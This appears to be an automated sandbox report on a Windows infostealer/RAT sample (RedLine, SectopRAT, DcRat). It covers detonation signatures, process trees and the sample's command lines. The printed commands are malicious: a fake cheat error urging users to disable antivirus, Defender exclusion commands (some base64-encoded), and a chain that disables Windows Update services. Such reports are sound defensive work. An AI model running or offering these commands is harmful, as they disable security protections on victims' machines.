Malware Analysis Report

2024-11-13 18:04

Sample ID 241106-m7mcbsygmd
Target 1db3a38e9cff8b2aec7b73668e6768002c2bddbf
SHA256 ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
Tags
redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan dcrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c

Threat Level: Known bad

The file 1db3a38e9cff8b2aec7b73668e6768002c2bddbf was found to be: Known bad.

Malicious Activity Summary

redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan dcrat

Redline family

SectopRAT payload

Sectoprat family

Disables service(s)

RedLine

SectopRAT

RedLine payload

Dcrat family

DcRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Drops file in Drivers directory

Stops running service(s)

Possible privilege escalation attempt

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

Modifies file permissions

Checks computer location settings

Power Settings

Obfuscated Files or Information: Command Obfuscation

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-06 11:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 11:06

Reported

2024-11-06 11:09

Platform

win7-20240903-en

Max time kernel

149s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"

Signatures

Disables service(s)

evasion execution

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A

Stops running service(s)

evasion execution

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2608 set thread context of 2556 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 2868 set thread context of 784 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 1632 set thread context of 1780 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 2116 set thread context of 2232 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\windowshost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\driverPerf\cominto.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2380 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2548 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2076 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2076 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2076 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2052 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2052 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2052 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2052 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2280 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2280 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2280 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2280 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2300 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 2300 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 2300 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 2300 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 2772 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 2552 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1600 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 1600 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 1600 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 1600 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1600 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 1600 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 1600 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 1600 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe

"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "

C:\driverPerf\cominto.exe

"C:\driverPerf\cominto.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add 